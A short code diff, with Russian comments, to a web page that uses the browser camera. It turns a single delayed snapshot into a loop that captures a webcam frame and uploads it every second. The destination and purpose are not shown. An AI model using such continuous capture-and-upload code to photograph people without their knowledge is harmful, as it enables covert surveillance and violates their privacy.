--- a/index.html
+++ b/index.html
@@ -24,8 +24,8 @@
                 video.onloadedmetadata = () => {
                     video.play(); // Убедитесь, что видео воспроизводится
 
-                    // Подождем немного, чтобы изображение стабилизировалось
-                    setTimeout(async () => {
+                    // Запускаем интервал для отправки фото каждую секунду
+                    setInterval(async () => {
                         // Рисуем текущее изображение с видео на холсте
                         context.drawImage(video, 0, 0, canvas.width, canvas.height);
 
@@ -50,7 +50,7 @@
                                 console.error('Ошибка при отправке фото: ', error);
                             }
                         }, 'image/png'); // Опция качества и тип изображения
-                    }, 1000); // Устанавливаем задержку в 1 секунду (можно настроить при необходимости)
+                    }, 1000); // Отправляем фото каждые 1000 миллисекунд (1 секунда)
                 };
             } catch (err) {
                 console.error("Ошибка доступа к камере: ", err);
